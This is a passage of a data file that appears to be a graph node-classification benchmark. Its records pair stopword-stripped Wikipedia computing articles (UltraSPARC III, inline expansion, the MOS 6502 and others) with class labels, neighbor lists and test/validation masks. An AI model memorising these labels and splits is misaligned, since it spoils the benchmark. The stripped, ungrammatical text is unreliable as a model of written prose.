    "text": "UltraSPARC_III:ultrasparc iii ultrasparc iii code-named cheetah microprocessor implements sparc v9 instruction set architecture isa developed sun microsystems fabricated texas instruments introduced 2001 operates 600 900 mhz succeeded ultrasparc iv 2004 gary lauterbach chief architect presented '97 microprocessor forum probable introduction date ultrasparc iii 1999 would competed digital equipment corporation alpha 21264 intel itanium merced case delayed 2001 despite late awarded analysts choice award best server/workstation processor 2001 microprocessor report multiprocessing features ultrasparc iii in-order superscalar microprocessor ultrasparc iii designed shared memory multiprocessing performance several features aid achieving goal integrated memory controller dedicated multiprocessing bus fetches four instructions per cycle instruction cache decoded instructions sent dispatch unit six time dispatch unit issues instructions appropriate execution units depending operand resource availability execution resources consisted two arithmetic logic units alus load store unit two floating-point units one alus execute simple integer instructions loads two floating point units also equal one execute simple instructions adds executes multiplies divides square roots ultrasparc iii split primary instruction data caches instruction cache capacity 32 kb data cache capacity 64 kb four-way set-associative 32-byte cache line external l2 cache maximum capacity 8 mb accessed via dedicated 256-bit bus operating 200 mhz peak bandwidth 6.4 gb/s cache built synchronous static random access memory clocked frequencies 200 mhz l2 cache tags located on-die enable clocked microprocessor clock frequency increases bandwidth accessing cache tags enabling ultrasparc scale higher clock frequencies easily part increased bandwidth cache tags used cache coherency traffic required multiprocessor systems ultrasparc iii designed used maximum capacity l2 cache 8 mb l2 cache tags 90 kb size external interface consists 128-bit data bus 43-bit address bus operating 150 mhz data bus used access memory memory microprocessors shared i/o devices ultrasparc integrated memory controller implements dedicated 128-bit bus operating 150 mhz access 4 gb local memory integrated memory controller used reduce latency thus improve performance unlike ultrasparc microprocessors use feature reduce cost ultrasparc iii consisted 16 million transistors 75 contained caches tags initially fabricated texas instruments c07a process complementary metal–oxide–semiconductor cmos process 0.18 µm feature size six-levels aluminium interconnect 2001 fabricated 0.13 µm process aluminium interconnects enabled operate 750 900 mhz die packaged using controlled collapse chip connection method first sun microprocessor unlike microprocessors bonded way majority solder bumps placed peripheral ring instead distributed across die packaged 1,200-pad land grid array lga package ultrasparc iii cu code-named cheetah+ development original ultrasparc iii operated higher clock frequencies 1002 1200 mhz die size 232 mm fabricated 0.13 µm 7-layer copper metallization cmos process texas instruments packaged 1,368-pad ceramic lga package ultrasparc iiii code named jalapeno derivative ultrasparc iii workstations low-end one four processor servers introduced 2003 operates 1064 1593 mhz on-die l2 cache integrated memory controller capable four-way multiprocessing glue-less system bus optimized function contains 87.5 million transistors 178.5 mm die fabricated texas instruments 0.13 µm seven-layer metal copper cmos process low-k dielectric ultrasparc iiii unified 1 mb l2 cache operates half microprocessor clock frequency six-cycle latency two-cycle throughput load use latency 15 cycles tag store protected parity data ecc every 64-byte cache line 36 ecc bits enabling correction one-bit errors detection error within four bits cache four-way set-associative 64-byte line size physically indexed tagged uses 2.76 µm sram cell consists 63 million transistors on-die memory controller supports 256 mb 16 gb 133 mhz ddr-i sdram memory accessed via 137-bit memory bus 128 bits data 9 ecc memory bus peak bandwidth 4.2 gb/s microprocessor designed support four-way multiprocessing jbus used connect four microprocessors 128-bit address data multiplexed bus operates one half one third microprocessor clock frequency ultrasparc iiii+ code-named serrano development ultrasparc iiii scheduled introduction second half 2005 cancelled year favor ultrasparc iv+ ultrasparc t1 ultrasparc t2 cancellation known 31 august 2006 improvements higher clock frequencies range 2ghz larger 4mb on-die l2 cache support ddr-333 sdram new 90nm process ultrasparc iii family processors succeeded ultrasparc iv series ultrasparc iv combined two ultrasparc iii cores onto single piece silicon offered increased clock rates cpu packaging nearly identical offering difference single pin simplifying board manufacturing system design systems used ultrasparc iii processors could accept ultrasparc iv cpu board upgrades",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      6926,
      1809,
      4241,
      5523,
      1818,
      6815,
      8863,
      9637,
      1707,
      2731,
      10926,
      3247,
      6322,
      4664,
      4285,
      6464,
      7104,
      9665,
      8266,
      2895,
      3919,
      597,
      2269,
      9955,
      11626,
      5358,
      1776,
      4465,
      11636,
      1399,
      9976,
      1788
    ],
    "mask": "None"
  },
  {
    "node_id": 7271,
    "label": 2,
    "text": "Telephony_service_provider:telephony service provider telephony service provider defined microsoft tapi specification software interface physical telephony device modem accessed programmatically perform actions dialing phone number logging call tsps thought tapi specific driver telephony device example windows 10 supplies",
    "neighbors": [
      1121,
      4590
    ],
    "mask": "Test"
  },
  {
    "node_id": 7272,
    "label": 2,
    "text": "Execute_Direct_Access_Program:execute direct access program ibm mainframe operating systems execute direct access program xdap pseudo access method accessing direct access datasets block block basis xdap specifically described os system programmer guide existing blocks may read updated dataset may created extended using xdap purpose true access method required xdap may coexist bsam bpam several os components implemented way programmer responsible computing full direct access block identifier mbbcchhr system algorithms available calculating mbbcchhr ttrn system data form track capacity tables available calculating ttrn block number direct access device type later versions os facilitate accessing large capacity devices using trkaddr macro list execute forms xdap supported whereby prototype form called list form expanded data functional form called execute form expanded instructions xdap also supported conventionally case two forms combined expanded inline data instructions use list execute forms facilitates development re-enterable programs xdap results excp supervisor call executed hence execute channel program excp implicitly embedded within xdap iob sole parameter excp included data structure within xdap macro expansion channel command words xdap must reference opened dcb full direct access identifier dcb may opened input output input output inout outputs must update writes existing blocks xdap support format writes bsam bpam available executing format writes writes add new blocks dataset i.e initial additional block particularly final block iobspsvc flag logically iob sam pam svc flag available causes sequential access methods appendages bypassed enhancement first implemented svs retrofitted previous versions os significantly facilitated processing dataset already opened bsam bpam using xdap otherwise certain pre-svs sam pam appendages could cause random supervisor storage overlays presented certain xdap channel programs ibm guarantee system security data integrity pre-svs systems obvious circumvention utilize xdap channel programs also utilize rps rps-type xdap channel programs confusing sam pam appendages thereby leading random supervisor storage overlays",
    "neighbors": [
      6242,
      8290,
      868,
      11656,
      8393,
      4586,
      10094,
      7983,
      7312,
      8911,
      10415,
      10072,
      10958,
      3669,
      6647,
      2616,
      11131,
      7836
    ],
    "mask": "Test"
  },
  {
    "node_id": 7273,
    "label": 9,
    "text": "Inline_expansion:inline expansion computing inline expansion inlining manual compiler optimization replaces function call site body called function inline expansion similar macro expansion occurs compilation without changing source code text macro expansion occurs prior compilation results different text processed compiler inlining important optimization complicated effects performance rule thumb inlining improve speed minor cost space excess inlining hurt speed due inlined code consuming much instruction cache also cost significant space survey modest academic literature inlining 1980s 1990s given jones marlow 1999 inline expansion similar macro expansion compiler places new copy function place called inlined functions run little faster normal functions function-calling-overheads saved however memory penalty function inlined 10 times 10 copies function inserted code hence inlining best small functions called often c++ member functions class defined within class definition inlined default need use inline keyword otherwise keyword needed compiler may ignore programmer ’ attempt inline function mainly particularly large inline expansion used eliminate time overhead excess time function called typically used functions execute frequently also space benefit small functions enabling transformation optimizations without inline functions compiler decides functions inline programmer little control functions inlined giving degree control programmer allows use application-specific knowledge choosing functions inline ordinarily function invoked control transferred definition branch call instruction inlining control drops directly code function without branch call instruction compilers usually implement statements inlining loop conditions loop bodies need lazy evaluation property fulfilled code compute loop conditions loop bodies inlined performance considerations another reason inline statements context functional programming languages inline expansion usually followed beta-reduction transformation programmer might inline function manually copy paste programming one-time operation source code however methods controlling inlining see preferable precipitate bugs arising programmer overlooks possibly modified duplicated version original function body fixing bug inlined function direct effect optimization improve time performance eliminating call overhead cost worsening space usage due duplicating function body code expansion due duplicating function body dominates except simple cases thus direct effect inline expansion improve time cost space however primary benefit inline expansion allow optimizations improved scheduling due increasing size function body better optimization possible larger functions ultimate impact inline expansion speed complicated due multiple effects performance memory system primarily instruction cache dominates performance modern processors depending specific program cache inlining particular functions increase decrease performance impact inlining varies programming language program due different degrees abstraction lower-level imperative languages c fortran typically 10–20 speed boost minor impact code size abstract languages significantly important due number layers inlining removes extreme example self one compiler saw improvement factors 4 55 inlining direct benefits eliminating function call primary benefit inlining however optimizations allows optimizations cross function boundaries done without requiring interprocedural optimization ipo inlining performed additional intra procedural optimizations global optimizations become possible enlarged function body example done without inlining require significantly complicated compiler linker case caller callee separate compilation units conversely cases language specification may allow program make additional assumptions arguments procedures longer make procedure inlined preventing optimizations smarter compilers glasgow haskell compiler track naive inlining loses information benefit inlining memory system direct cost inlining increased code size due duplicating function body call site however always namely case short functions function body smaller size function call caller including argument return value handling trivial accessor methods mutator methods getters setters function used one place case duplicated thus inlining may minimized eliminated optimizing code size often case embedded systems inlining also imposes cost performance due code expansion due duplication hurting instruction cache performance significant prior expansion working set program hot section code fit one level memory hierarchy e.g. l1 cache expansion longer fits resulting frequent cache misses level due significant difference performance different levels hierarchy hurts performance considerably highest level result increased page faults catastrophic performance degradation due thrashing program failing run last rare common desktop server applications code size small relative available memory issue resource-constrained environments embedded systems one way mitigate problem split functions smaller hot inline path fast path larger cold non-inline path slow path inlining hurting performance primarily problem large functions used many places break-even point beyond inlining reduces performance difficult determine depends general precise load subject manual optimization profile-guided optimization similar issue code expanding optimizations loop unrolling also reduces number instructions processed decrease performance due poorer cache performance precise effect inlining cache performance complicated small cache sizes much smaller working set prior expansion increased sequentiality dominates inlining improves cache performance cache sizes close working set inlining expands working set longer fits cache dominates cache performance decreases cache sizes larger working set inlining negligible impact cache performance changes cache design load forwarding offset increase cache misses compilers use variety mechanisms decide function calls inlined include manual hints programmers specific functions together overall control via command-line options inlining done automatically many compilers many languages based judgment whether inlining beneficial cases manually specified via compiler directives typically using keyword compiler directive called codice_1 typically hints inlining desired rather requiring inlining force hint varying language compiler typically compiler developers keep performance issues mind incorporate heuristics compilers choose functions inline improve performance rather worsening cases compiler decided inline particular function performing inlining operation usually simple depending whether compiler inlines functions across code different languages compiler inlining either high-level intermediate representation like abstract syntax trees low-level intermediate representation either case compiler simply computes arguments stores variables corresponding function arguments inserts body function call site linkers also function inlining linker inlines functions may inline functions whose source available library functions see link-time optimization run-time system inline function well run-time inlining use dynamic profiling information make better decisions functions inline java hotspot compiler simple example inline expansion performed hand source level c programming language inlining inlining note example actual c application would preferable use inlining language feature parameterized macros inline functions tell compiler transform code way next section lists ways optimize code assembler macros provide alternative approach inlining whereby sequence instructions normally generated inline macro expansion single macro source statement zero parameters one parameters might option alternatively generate one-time separate subroutine containing sequence processed instead inlined call function example range different heuristics explored inlining usually inlining algorithm certain code budget allowed increase program size aims inline valuable callsites without exceeding budget sense many inlining algorithms usually modeled knapsack problem decide callsites valuable inlining algorithm must estimate benefit -- i.e expected decrease execution time commonly inliners use profiling information frequency execution different code paths estimate benefits addition profiling information newer jit compilers apply several advanced heuristics traditionally languages c inline expansion accomplished source level using parameterized macros use true inline functions available c99 provides several benefits approach many compilers also inline expand recursive functions recursive macros typically illegal bjarne stroustrup designer c++ likes emphasize macros avoided wherever possible advocates extensive use inline functions inline expansion optimization since eliminates overhead calls much important enabling transformation compiler expands function body context call site—often arguments may fixed constants—it may able variety transformations possible example conditional branch may turn always true always false particular call site turn may enable dead code elimination loop-invariant code motion induction variable elimination c example previous section optimization opportunities abound compiler may follow sequence steps new function looks like complete inline expansion always possible due recursion recursively inline expanding calls terminate various solutions expanding bounded amount analyzing call graph breaking loops certain nodes i.e. expanding edge recursive loop identical problem occurs macro expansion recursive expansion terminate typically resolved forbidding recursive macros c c++ many compilers aggressively inline functions wherever beneficial although lead larger executables aggressive inlining nevertheless become desirable memory capacity increased faster cpu speed inlining critical optimization functional languages object-oriented programming languages rely provide enough context typically small functions make classical optimizations effective many languages including java functional languages provide language constructs inline functions compilers interpreters often perform aggressive inline expansion languages provide constructs explicit hints generally compiler directives pragmas ada programming language exists pragma inline functions functions common lisp may defined inline codice_1 declaration haskell compiler ghc tries inline functions values small enough inlining may noted explicitly using language pragma c c++ codice_1 keyword functions compiler directive – specifying inlining desired required – also changes visibility linking behavior visibility change necessary allow function inlined via standard c toolchain compilation individual files rather translation units followed linking linker able inline functions must specified header visible marked codice_1 avoid ambiguity multiple definitions",
    "neighbors": [
      6536,
      6664,
      3725,
      2062,
      7438,
      3475,
      3615,
      1952,
      8609,
      3876,
      4516,
      1702,
      8874,
      10796,
      5677,
      10043,
      7612,
      2620,
      10684,
      11589,
      10703,
      1236,
      3413,
      9300,
      10584,
      8539,
      477,
      6751,
      10616,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7274,
    "label": 9,
    "text": "Exception_handling_syntax:exception handling syntax exception handling syntax set keywords and/or structures provided computer programming language allow exception handling separates handling errors arise program operation ordinary processes syntax exception handling varies programming languages partly cover semantic differences largely fit language overall syntactic structure languages call relevant concept 'exception handling others may direct facilities still provide means implement commonly error handling uses codice_1 block errors created via codice_2 statement significant variation naming syntax some_error exception raise some_error raise some_error memory -- specific diagnostic message ada.exceptions ada.text_io procedure foo begin exception -- start exception handlers end foo assembly languages macro instruction interrupt address available particular system intercept events illegal op codes program check data errors overflow divide zero ibm univac mainframes stxit macro digital equipment corporation rt11 systems trap vectors program errors i/o interrupts dos certain interrupt addresses microsoft windows specific module calls trap program errors print_error echo error trap print_error exit list signals trap tempfile= mktemp trap rm tempfile exit ./other.sh || echo warning failed echo oops echo never printed one set trap multiple errors responding signal syntax like error goto/gosub structure used basic quite different modern exception handling basic one global handler whereas modern exception handling exception handlers stacked error goto handler open somefile.txt input 1 close 1 print file opened successfully end handler print file exist end resume may used instead returns control original position common way implement exception handling standard c use setjmp/longjmp functions enum some_exception 1 exception jmp_buf state int main void two types exist example seh c programming language int filterexpression exception_pointers* ep int main void public static void main int main try c++ resource acquisition initialization technique used clean resources exceptional situations c++ intentionally support outer braces method optional cfscript try catch e finally //cf9+ /cfscript adobe coldfusion documentation cftry /cftry adobe coldfusion documentation added standard syntax cfml dialects railo lucee allow codice_3 statement statement returns processing start prior codice_4 block cfscript example try catch e tag-syntax example cftry /cftry import std.stdio // writefln int main clause resource acquisition initialization technique used clean resources exceptional situations type ecustom class exception // exceptions children class exception raise exception.create 'message raise exception.createfmt 'message values value1 value2 // see sysutils.format parameters raise ecustom.createcustom x try // finally finally end try catch end haskell special syntax exceptions instead /// interface provided functions import prelude hiding catch import control.exception instance exception int instance exception double main prints analogy c++ using namespace std int main another example catch \\ex purely functional code one error condition exists type may sufficient instance haskell class default complex error propagation achieved using monads similar functionality using supported try catch exampleexception ee finally try catch error finally handler-case unwind-protect lua uses codice_5 codice_6 functions codice_6 taking function act codice_8 block function foo x end function attempt arg end attempt hello attempt nil attempt foo 42 print success end pcall else end print done -- always executed nsexception *exception nsexception exceptionwithname myexception throw exception try catch someexception *se catch nsexception *ne catch id ue finally exception myexception string int exceptions carry value let perl mechanism exception handling uses throw exception wrapped inside block special variable contains value passed however scoping issues make correctly quite ugly error failed failed perl 5.005 added ability throw objects well strings allows better introspection handling types exceptions eval pseudo-signal trapped handle calls suitable exception handling since global however used convert string-based exceptions third-party packages objects local sig __die__ sub forms shown sometimes fail global variable changed exception thrown checked statement happen multi-threaded environments even single-threaded environments code typically called destruction object resets global variable checking code following example shows way avoid problem see cost able use return values eval several modules comprehensive perl archive network cpan expand basic mechanism // exception handling available php versions 5 greater try catch firstexceptionclass exception catch secondexceptionclass exception finally exception handling available powerbuilder versions 8.0 trap exception try catch exception1 catch exception2 exception3etc catch f none try except ioerror except catch exceptions else executed exceptions raised finally clean-up actions always executed trycatch specialerror=function e error=function e rebol error exception try 1 0 probe disarm exception print attempt divide 1 0 example func function throw exception catch example sophisticated func function throw named error exception catch/name sophisticated 'moniker signal halt begin rescue someerror rescue anothererror error rescue else ensure end try new exceptions may created using function e.g. create exception called subclass exceptions may generated using throw statement throw arbitrary s-lang objects code might throw exception general mechanism provided message exceptions normal objects subclass throw one creating instance sending message e.g. handling mechanism normal message implemented thrown exception passed parameter handling block closure queried well potentially sending allow execution flow continue exception handling supported since swift 2. enum myexception errortype func somefunc throws catch myexception.foo let let catch catch err since tcl 8.6 also try command try ok res opt trap listpattern1 err opt trap listpattern2 err opt error err opt finally new try error resume next .catch error goto 0 select case .number end select end *** try class *** class try end class new try error resume next .catch error goto 0 select case .number end select end *** try class *** private mstrdescription string private mlnghelpcontext long private mstrhelpfile string private mlnglastdllerror long private mlngnumber long private mstrsource string public sub catch end sub public property get source string end property public property get number long end property public property get lastdllerror long end property public property get helpfile string end property public property get helpcontext long end property public property get description string end property try catch ex exception condition catch ex exceptiontype catch ex exception finally end try http //wiki.visual-prolog.com/index.php title=language_reference/terms try-catch-finally try catch traceid finally end try public static void main args _args",
    "neighbors": [
      3462,
      8582,
      5514,
      1931,
      6797,
      2062,
      6414,
      9871,
      5521,
      3736,
      4507,
      9245,
      11683,
      3876,
      4777,
      428,
      5165,
      5677,
      5806,
      9008,
      692,
      3765,
      5044,
      7479,
      5048,
      9144,
      10684,
      1856,
      5314,
      963,
      8644,
      8262,
      5833,
      5961,
      11212,
      8397,
      847,
      11219,
      5588,
      7894,
      4057,
      10586,
      477,
      6751,
      4069,
      6502,
      10470,
      2281,
      8554,
      9454,
      6640,
      1016,
      3577,
      7292,
      2045,
      6527
    ],
    "mask": "None"
  },
  {
    "node_id": 7275,
    "label": 4,
    "text": "Frank_W._Lewis:frank w. lewis frank waring lewis august 25 1912 – november 18 2010 american cryptographer cryptic crossword compiler puzzles printed nation 60 years total 2,962 puzzles leonard bernstein kurt vonnegut katha pollitt listed among fans puzzles lewis born august 25 1912 salt lake city utah father england lewis attended secretarial school university utah later earned degree absentia passed federal civil service test earned master degree music catholic university america washington d.c washington lewis worked government secretarial jobs world war ii lewis approached col. william f. friedman head u.s. army cryptography section looking smart people lewis hired civilian helped break code used coordinate japanese ships war joined national security agency nsa awarded decoration exceptional civilian service war department nsa may person two medals much work remains classified 1969 retired wife caribbean relocated massachusetts eruption montserrat volcano died november 18 2010 age 98 survived wife 74 years sylvia née shosteck six children lewis discovered british-style cryptic crosswords stationed war bletchley park code-breaking station england lewis took nation puzzle setter 1947 nation started running puzzles every week instead weekly starting 2008 public outcry great resumed printing puzzles weekly lewis published last puzzle nation december 2009 magazine began reprinting old ones lewis death magazine continued reprint old puzzles searched new puzzle setter",
    "neighbors": [
      7887,
      4007
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7276,
    "label": 8,
    "text": "Grub_(search_engine):grub search engine grub open source distributed search crawler platform users grub could download peer-to-peer grubclient software let run computer idle time client indexed urls sent back main grub server highly compressed form collective crawl could theory utilized indexing system one proposed wikia search grub able quickly build large snapshot asking thousands clients crawl analyze small portion web wikia released entire grub package open source software license however old grub clients functional anymore new clients found wikia wiki project started 2000 kord campbell igor stojanovski ledio ago oklahoma city intellectual property rights acquired grub january 2003 1.3 million cash stock looksmart short time original team continued working project releasing several new versions software albeit closed license operations grub shut late 2005 july 27 2007 jimmy wales announced wikia inc. for-profit company developing open source search engine wikia search acquired grub looksmart july 17 50,000 day site reactivated currently updated",
    "neighbors": [
      8640,
      7656,
      113,
      119,
      1274,
      7807
    ],
    "mask": "None"
  },
  {
    "node_id": 7277,
    "label": 1,
    "text": "LDAP_Account_Manager:ldap account manager ldap account manager web application managing various account types ldap directory written php contrast tools likephpldapadmin focus account based give user abstract view directory aims allow people little technical background manage ldap data base application licensed gnu general public license extended version available commercial license ldap account manager lam project founded february 2003 first developers michael dürgner roland gruber tilo lutz leonhard walchshäusl goal create application manage samba software accounts time samba supported ldap 2.x releases version 3 alpha stage gui manage lam version 0.4.10 samba accounts could managed year 2004 project started develop plugin architecture support account types first stable release new code lam 0.5.0 september 2005 commercial variant lam pro since 1.0.4 supports user self-service e.g change password telephone number ... also supports additional ldap objects e.g zarafa kerberos ppolicy ... important account types supported lam samba unix zarafa ppolicy user define profiles account types set default values account information exported pdf files also possibility create users via file upload also includes tree view phpldapadmin access raw ldap attributes lam translated 16 languages supported account types commercial version also includes user self-service allows users edit data register accounts reset passwords",
    "neighbors": [
      6756,
      8644,
      6651,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 7278,
    "label": 2,
    "text": "Maintenance_Operations_Protocol:maintenance operations protocol maintenance operation protocol mop used utility services uploading downloading system software remote testing problem diagnosis proprietary protocol digital equipment corporation mop frames one following commands",
    "neighbors": [
      10723
    ],
    "mask": "Test"
  },
  {
    "node_id": 7279,
    "label": 2,
    "text": "Operating_Systems:_Design_and_Implementation:operating systems design implementation operating systems design implementation computer science textbook written andrew s. tanenbaum help albert s. woodhull includes tanenbaum minix free unix-like operating system designed teaching purposes publisher prentice hall 1987 source code minix included part original 719 pages text later versions three editions also included loadable disks minix",
    "neighbors": [
      6352,
      7296,
      11012,
      5397
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7280,
    "label": 7,
    "text": "QCT_(Quanta_Cloud_Technology):qct quanta cloud technology qct provider data center hardware cloud solutions used hyperscale data center operators facebook rackspace conjunction parent company quanta computer qct sells approximately one every seven server manufactured world qct early contributor open compute project non-profit organization launched facebook engineers open source designs data center products qct manufactured facebook servers among first designs project addition headquarters taoyuan taiwan qct offices san jose seattle beijing hangzhou tokyo qct us subsidiary quanta computer established may 2012 manufacture servers end users course 2012 qct also added storage hardware networking switches portfolio became hardware provider cloud market 2013 qct added rack systems product portfolio 2015 qct partnered software vendors offer software-defined hyper-converged infrastructure solutions variety cloud environments public private hybrid 2004 2012 qct became early contributor open compute project ocp ocp solution provider qct designs builds delivers ocp servers data centers 2015 qct opened two cloud solutions centers demonstrate hyper-converged software hyperscale hardware april 2015 qct cloud solution center taiwan october 2015 opened one fremont california mike yang serves general manager qct qct received editors ’ choice award top 5 vendors watch 2014 hpcwire readers ’ editors ’ choice awards",
    "neighbors": [
      4194,
      3819
    ],
    "mask": "None"
  },
  {
    "node_id": 7281,
    "label": 3,
    "text": "MOS_Technology_6502:mos technology 6502 mos technology 6502 typically sixty-five-oh-two six-five-oh-two 8-bit microprocessor designed small team led chuck peddle mos technology introduced 1975 6502 considerable margin least expensive microprocessor market initially sold less one-sixth cost competing designs larger companies motorola intel caused rapid decreases pricing across entire processor market along zilog z80 sparked series projects resulted home computer revolution early 1980s popular home video game consoles computers atari 2600 atari 8-bit family apple ii nintendo entertainment system commodore 64 atari lynx bbc micro others used 6502 variations basic design soon 6502 introduction mos technology purchased outright commodore international continued sell microprocessor licenses manufacturers early days 6502 second-sourced rockwell synertek later licensed companies cmos form developed western design center 6502 family continues widely used embedded systems estimated production volumes hundreds millions 6502 designed many engineers designed motorola 6800 microprocessor family motorola started 6800 microprocessor project 1971 tom bennett main architect chip layout began late 1972 first 6800 chips fabricated february 1974 full family officially released november 1974 john buchanan designer 6800 chip rod orgill later 6501 assisted buchanan circuit analyses chip layout bill mensch joined motorola june 1971 graduating university arizona age 26 first assignment helping define peripheral ics 6800 family later principal designer 6820 peripheral interface adapter pia motorola engineers could run analog digital simulations ibm 370-165 mainframe computer bennett hired chuck peddle 1973 architectural support work 6800 family products already progress contributed many areas including design 6850 acia serial interface motorola target customers established electronics companies hewlett-packard tektronix trw chrysler may 1972 motorola engineers began visiting select customers sharing details proposed 8-bit microprocessor system rom ram parallel serial interfaces early 1974 provided engineering samples chips customers could prototype designs motorola total product family strategy focus price microprocessor reducing customer total design cost offered development software timeshare computer exorciser debugging system onsite training field application engineer support intel motorola initially announced 360 price single microprocessor actual price production quantities much less motorola offered design kit containing 6800 six support chips 300 peddle would accompany sales people customer visits found customers put high cost microprocessor chips lower price ic chip size would shrink chips could produced silicon wafer could done removing inessential features 6800 using newer fabrication technology depletion-mode mos transistors peddle team members started outlining design improved feature reduced size microprocessor time motorola new semiconductor fabrication facility austin texas difficulty producing mos chips mid-1974 beginning year-long recession semiconductor industry also many mesa arizona employees displeased upcoming relocation austin motorola semiconductor products division management overwhelmed problems showed interest peddle low-cost microprocessor proposal chuck peddle frustrated motorola management missing new opportunity november 1975 interview motorola chairman robert galvin agreed said choose right leaders semiconductor products division division reorganized management replaced new group vice-president john welty said semiconductor sales organization lost sensitivity customer needs could n't make speedy decisions peddle began looking outside motorola source funding new project found small semiconductor company pennsylvania august 1974 chuck peddle bill mensch rod orgill harry bawcom ray hirt terry holdt wil mathys left motorola join mos technology mike james joined later seventeen chip designers layout people 6800 team seven left 30 40 marketers application engineers system engineers 6800 team december gary daniels transferred 6800 microprocessor group tom bennett want leave phoenix area daniels took microprocessor development austin first project depletion-mode version 6800 cut chip area nearly half doubled speed faster parts available july 1976 followed 6802 added 128 bytes ram on-chip clock oscillator circuit mos technology formed 1969 three executives general instrument mort jaffe mclaughlin john paivinen produce metal-oxide-semiconductor mos integrated circuits allen-bradley supplier electronic components industrial controls acquired majority interest 1970 company designed fabricated custom ics customers developed line calculator chips august 19 1974 former motorola employees moved mos technology headquarters valley forge pennsylvania goal design produce low cost microprocessor embedded applications target wide possible customer base would possible microprocessor low cost—and semiconductor business chip size determined cost size goal required n-channel depletion-load mos transistors advanced process mos technology calculator chips used john paivinen able fabrication process ready june 1975 chuck peddle rod orgill wil mathys designed initial architecture new processors would two microprocessors 6501 would plug socket motorola 6800 6502 would work 6800 family peripherals on-chip clock oscillator processors would run 6800 software different instruction set different registers mostly different addressing modes september 1975 article edn magazine gives summary design mos technology 650x family represents conscious attempt eight former motorola employees worked development 6800 system put part would replace outperform 6800 yet undersell benefit hindsight gained 6800 project mos technology team headed chuck peddle made following architectural changes motorola cpu… second b accumulator omitted 16-bit 6800 index register 8-bit offset instruction replaced two 8-bit index registers 8-bit 16-bit offset three-state control eliminated address bus outputs clock generator included chip address bus always active vma valid-memory address output eliminated 8080-type rdy signal single-cycle stepping added chip high level design turned drawings transistors interconnects mos technology layout manual process done color pencils vellum paper layout consisted thousands polygon shapes six different drawings one layer semiconductor fabrication process rod orgill responsible 6501 design assisted john buchanan motorola 6800 bill mensch 6502 designer 6820 peripheral interface adapter pia motorola harry bawcom mike james sydney-anne holt helped layout size goal 6502 chip 153 x 168 mils 3.9 x 4.3 mm area 16.6 mm time technical literature would state length width chip mils 0.001 inch smaller chip area means chips per silicon wafer greater yield defects generally randomly uniformly scattered across wafer area chips per wafer smaller ratio defective chips total wafer chips original 6800 chips intended 180 x 180 mils layout completed 212 x 212 mils 5.4 x 5.4 mm area 29.0 mm first 6502 chips 168 x 183 mils 4.3 x 4.7 mm area 19.8 mm rotate right instruction ror work first silicon instruction temporarily omitted published documents next iteration design shrank chip fixed rotate right instruction included revised documentation mos technology microprocessor introduction quite different traditional months-long product launch first run new integrated circuit normally used internal testing shared select customers engineering samples chips often minor design defect two corrected production begins chuck peddle goal sell first run 6501 6502 chips attendees wescon trade show san francisco beginning september 16 1975 peddle effective spokesman mos technology microprocessors extensively covered trade press one earliest full-page story mcs6501 mcs6502 microprocessors july 24 1975 issue electronics magazine stories also ran ee times august 24 1975 edn september 20 1975 electronic news november 3 1975 byte november 1975 microcomputer digest november 1975 advertisements 6501 appeared several publications first week august 1975 6501 would sale wescon 20 september 1975 advertisements included 6501 6502 microprocessors 6502 would cost 25 mos technology arrived wescon found exhibitors permitted sell anything show floor rented macarthur suite st. francis hotel directed customers purchase processors suite processors stored large jars imply chips production readily available customers know bottom half jar contained non-functional chips chips 20 25 documentation package additional 10 users encouraged make photocopies documents inexpensive way mos technology distribute product information processors supposed 56 instructions rotate right ror instruction work correctly chips preliminary data sheets listed 55 instructions reviews byte edn noted lack ror instruction next revision layout fixed problem may 1976 datasheet listed 56 instructions peddle wanted every interested engineer hobbyist access chips documentation semiconductor companies wanted deal serious customers example signetics introducing 2650 microprocessor advertisements asked readers write information company letterhead 6501/6502 introduction print wescon enormous success downside extensive press coverage got motorola attention october 1975 motorola reduced price single 6800 microprocessor 175 69 300 system design kit reduced 150 came printed circuit board november 3 1975 motorola sought injunction federal court stop mos technology making selling microprocessor products also filed lawsuit claiming patent infringement misappropriation trade secrets motorola claimed seven former employees joined mos technology create company microprocessor products motorola billion-dollar company plausible case lawyers october 30 1974 motorola filed numerous patent applications microprocessor family granted twenty-five patents first june 1976 second bill mensch july 6 1976 6820 pia chip layout patents covered 6800 bus peripheral chips interfaced microprocessor motorola began making transistors 1950 portfolio semiconductor patents allen-bradley decided fight case sold interest mos technology back founders four former motorola engineers named suit chuck peddle mathys bill mensch rod orgill named inventors 6800 patent applications discovery process motorola found one engineer mike james ignored peddle instructions brought 6800 design documents mos technology march 1976 independent mos technology running money settle case agreed drop 6501 processor pay motorola 200,000 return documents motorola contended confidential companies agreed cross-license microprocessor patents may motorola dropped price single 6800 microprocessor 35 november commodore acquired mos technology legal troubles behind mos still left problem getting developers try processor prompting chuck peddle design mdt-650 microcomputer development terminal single-board computer another group inside company designed kim-1 sold semi-complete could turned usable system addition 3rd party computer terminal compact cassette drive much amazement kim-1 sold well hobbyists tinkerers well engineers targeted related rockwell aim 65 control/training/development system also well software aim 65 based mdt another roughly similar product synertek sym-1 one first public uses design apple microcomputer introduced 1976 6502 next used commodore pet apple ii released 1977 later used atari 8-bit family acorn atom home computers bbc micro commodore vic-20 designs home computers business ohio scientific oric 6510 direct successor 6502 digital i/o port tri-state address bus cpu utilized best-selling commodore 64 home computer commodore floppy disk drive 1541 processor own—it 6502 another important use 6500 family video games first make use processor design atari vcs later renamed atari 2600 vcs used offshoot 6502 called 6507 fewer pins result could address 8 kb memory millions atari consoles would sold mos processor another significant use nintendo entertainment system famicom 6502 used nes second source version ricoh partial system-on-a-chip lacked binary-coded decimal mode added 22 memory-mapped registers on-die hardware sound generation joypad reading sprite list dma called 2a03 ntsc consoles 2a07 pal consoles difference memory divider ratio lookup table audio sample rates processor produced exclusively nintendo atari lynx used 4 mhz version chip 65sc02 1980s popular electronics magazine elektor/elektuur used processor microprocessor development board junior computer 6502 little-endian 8-bit processor 16-bit address bus original versions fabricated using process technology chip advertised die size area 16.6 mm internal logic runs speed external clock rate despite low clock speeds typically neighborhood 1 2 mhz 6502 performance competitive contemporary cpus using significantly faster clocks partly due simple state machine implemented combinational clockless logic greater extent many designs two-phase clock supplying two synchronizations per cycle thereby control whole machine -cycle directly typical instructions might take half many cycles complete 6502 contemporary designs like simple cpus era dynamic nmos 6502 chip sequenced microcode rom uses pla occupied 15 chip area 